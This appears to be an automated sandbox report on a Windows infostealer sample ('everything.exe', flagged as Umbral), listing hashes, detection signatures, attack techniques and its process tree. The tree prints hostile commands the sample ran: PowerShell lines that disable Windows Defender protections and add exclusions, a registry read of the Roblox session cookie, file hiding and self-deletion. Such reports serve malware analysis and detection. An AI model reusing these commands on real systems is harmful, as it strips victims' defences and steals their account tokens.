Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
11-08-2024 11:35
Behavioral task
behavioral1
Sample
everything.exe
Resource
win10v2004-20240802-en
General
-
Target
everything.exe
-
Size
231KB
-
MD5
5e487f250a2b0c04f06f37b6d66b29ba
-
SHA1
68d5c6fcf314df40abf53b3462cb76dce9af887e
-
SHA256
3dec6623a9f5488bc8fc4a3185cddd03bdda73247063875943a79dd75c5071b6
-
SHA512
1f428c57ee5d53fbe590f12f3e345715b528c5aaa5e971e30fe760d9bf8660a09c1dbf7f94b73c5131c4261163e2fb6932a71ccf67b1a319f0dd1b06af823e54
-
SSDEEP
6144:hloZM+rIkd8g+EtXHkv/iD4EmQIkqNlOhLWU1pAe4dnb8e1mAYVi:ToZtL+EP8EmQIkqNlOhLWU1pAdpd
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/1692-0-0x000002C5E1CB0000-0x000002C5E1CF0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 108 powershell.exe 2460 powershell.exe 3992 powershell.exe 3520 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts everything.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 7 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1896 cmd.exe 2016 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3936 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2016 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1692 everything.exe 108 powershell.exe 108 powershell.exe 2460 powershell.exe 2460 powershell.exe 3992 powershell.exe 3992 powershell.exe 4504 powershell.exe 4504 powershell.exe 3520 powershell.exe 3520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1692 everything.exe Token: SeIncreaseQuotaPrivilege 4784 wmic.exe Token: SeSecurityPrivilege 4784 wmic.exe Token: SeTakeOwnershipPrivilege 4784 wmic.exe Token: SeLoadDriverPrivilege 4784 wmic.exe Token: SeSystemProfilePrivilege 4784 wmic.exe Token: SeSystemtimePrivilege 4784 wmic.exe Token: SeProfSingleProcessPrivilege 4784 wmic.exe Token: SeIncBasePriorityPrivilege 4784 wmic.exe Token: SeCreatePagefilePrivilege 4784 wmic.exe Token: SeBackupPrivilege 4784 wmic.exe Token: SeRestorePrivilege 4784 wmic.exe Token: SeShutdownPrivilege 4784 wmic.exe Token: SeDebugPrivilege 4784 wmic.exe Token: SeSystemEnvironmentPrivilege 4784 wmic.exe Token: SeRemoteShutdownPrivilege 4784 wmic.exe Token: SeUndockPrivilege 4784 wmic.exe Token: SeManageVolumePrivilege 4784 wmic.exe Token: 33 4784 wmic.exe Token: 34 4784 wmic.exe Token: 35 4784 wmic.exe Token: 36 4784 wmic.exe Token: SeIncreaseQuotaPrivilege 4784 wmic.exe Token: SeSecurityPrivilege 4784 wmic.exe Token: SeTakeOwnershipPrivilege 4784 wmic.exe Token: SeLoadDriverPrivilege 4784 wmic.exe Token: SeSystemProfilePrivilege 4784 wmic.exe Token: SeSystemtimePrivilege 4784 wmic.exe Token: SeProfSingleProcessPrivilege 4784 wmic.exe Token: SeIncBasePriorityPrivilege 4784 wmic.exe Token: SeCreatePagefilePrivilege 4784 wmic.exe Token: SeBackupPrivilege 4784 wmic.exe Token: SeRestorePrivilege 4784 wmic.exe Token: SeShutdownPrivilege 4784 wmic.exe Token: SeDebugPrivilege 4784 wmic.exe Token: SeSystemEnvironmentPrivilege 4784 wmic.exe Token: SeRemoteShutdownPrivilege 4784 wmic.exe Token: SeUndockPrivilege 4784 wmic.exe Token: SeManageVolumePrivilege 4784 wmic.exe Token: 33 4784 wmic.exe Token: 34 4784 wmic.exe Token: 35 4784 wmic.exe Token: 36 4784 wmic.exe Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeIncreaseQuotaPrivilege 700 wmic.exe Token: SeSecurityPrivilege 700 wmic.exe Token: SeTakeOwnershipPrivilege 700 wmic.exe Token: SeLoadDriverPrivilege 700 wmic.exe Token: SeSystemProfilePrivilege 700 wmic.exe Token: SeSystemtimePrivilege 700 wmic.exe Token: SeProfSingleProcessPrivilege 700 wmic.exe Token: SeIncBasePriorityPrivilege 700 wmic.exe Token: SeCreatePagefilePrivilege 700 wmic.exe Token: SeBackupPrivilege 700 wmic.exe Token: SeRestorePrivilege 700 wmic.exe Token: SeShutdownPrivilege 700 wmic.exe Token: SeDebugPrivilege 700 wmic.exe Token: SeSystemEnvironmentPrivilege 700 wmic.exe Token: SeRemoteShutdownPrivilege 700 wmic.exe Token: SeUndockPrivilege 700 wmic.exe Token: SeManageVolumePrivilege 700 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1692 wrote to memory of 4784 1692 everything.exe 81 PID 1692 wrote to memory of 4784 1692 everything.exe 81 PID 1692 wrote to memory of 3112 1692 everything.exe 84 PID 1692 wrote to memory of 3112 1692 everything.exe 84 PID 1692 wrote to memory of 108 1692 everything.exe 86 PID 1692 wrote to memory of 108 1692 everything.exe 86 PID 1692 wrote to memory of 2460 1692 everything.exe 88 PID 1692 wrote to memory of 2460 1692 everything.exe 88 PID 1692 wrote to memory of 3992 1692 everything.exe 90 PID 1692 wrote to memory of 3992 1692 everything.exe 90 PID 1692 wrote to memory of 4504 1692 everything.exe 92 PID 1692 wrote to memory of 4504 1692 everything.exe 92 PID 1692 wrote to memory of 700 1692 everything.exe 94 PID 1692 wrote to memory of 700 1692 everything.exe 94 PID 1692 wrote to memory of 5036 1692 everything.exe 96 PID 1692 wrote to memory of 5036 1692 everything.exe 96 PID 1692 wrote to memory of 2388 1692 everything.exe 98 PID 1692 wrote to memory of 2388 1692 everything.exe 98 PID 1692 wrote to memory of 3520 1692 everything.exe 100 PID 1692 wrote to memory of 3520 1692 everything.exe 100 PID 1692 wrote to memory of 3936 1692 everything.exe 102 PID 1692 wrote to memory of 3936 1692 everything.exe 102 PID 1692 wrote to memory of 1896 1692 everything.exe 104 PID 1692 wrote to memory of 1896 1692 everything.exe 104 PID 1896 wrote to memory of 2016 1896 cmd.exe 106 PID 1896 wrote to memory of 2016 1896 cmd.exe 106 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3112 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\everything.exe"C:\Users\Admin\AppData\Local\Temp\everything.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\everything.exe"2⤵
- Views/modifies file attributes
PID:3112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\everything.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:5036
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3936
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\everything.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2016
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD5e3840d9bcedfe7017e49ee5d05bd1c46
SHA1272620fb2605bd196df471d62db4b2d280a363c6
SHA2563ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f
SHA51276adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376
-
Filesize
948B
MD54b92d741d003e8d1f0394874017a6fe9
SHA11a4bebc2637bce160dae38d4d0bfdeb6b398059d
SHA2568c8532230d71f0818daebff0d2ab496b02c25bdaa7156701f663b5474ad876fc
SHA5125c2e84b072314aaae414f98f7dbeb13e030561b53270803d0cf7a8c6ed59368dcfdc4666e69abef39fcac5b75968a1174aca501023297a276a219ed0464612c6
-
Filesize
1KB
MD557083a8e45ebe4fd84c7c0f137ec3e21
SHA1857b5ea57f7bcf03cadee122106c6e58792a9b84
SHA256f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40
SHA5124bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87
-
Filesize
1KB
MD58473c0720d50f160d2a0aa6f2c469195
SHA112178cc31b143c8e205c974340c73f34aeadb1c2
SHA256575c9adfd431e013e5bfb5e133b805ed9e7aa77da05be167f3f8b92211e643b0
SHA51261fe1040a5fbc1c0bf7290bc63b336152831647cafda9d491ae65f927b49fad9d8feb867115eddc8aeab6a8d5c3fd398edde0d177b11180b33982deefd52ceaf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82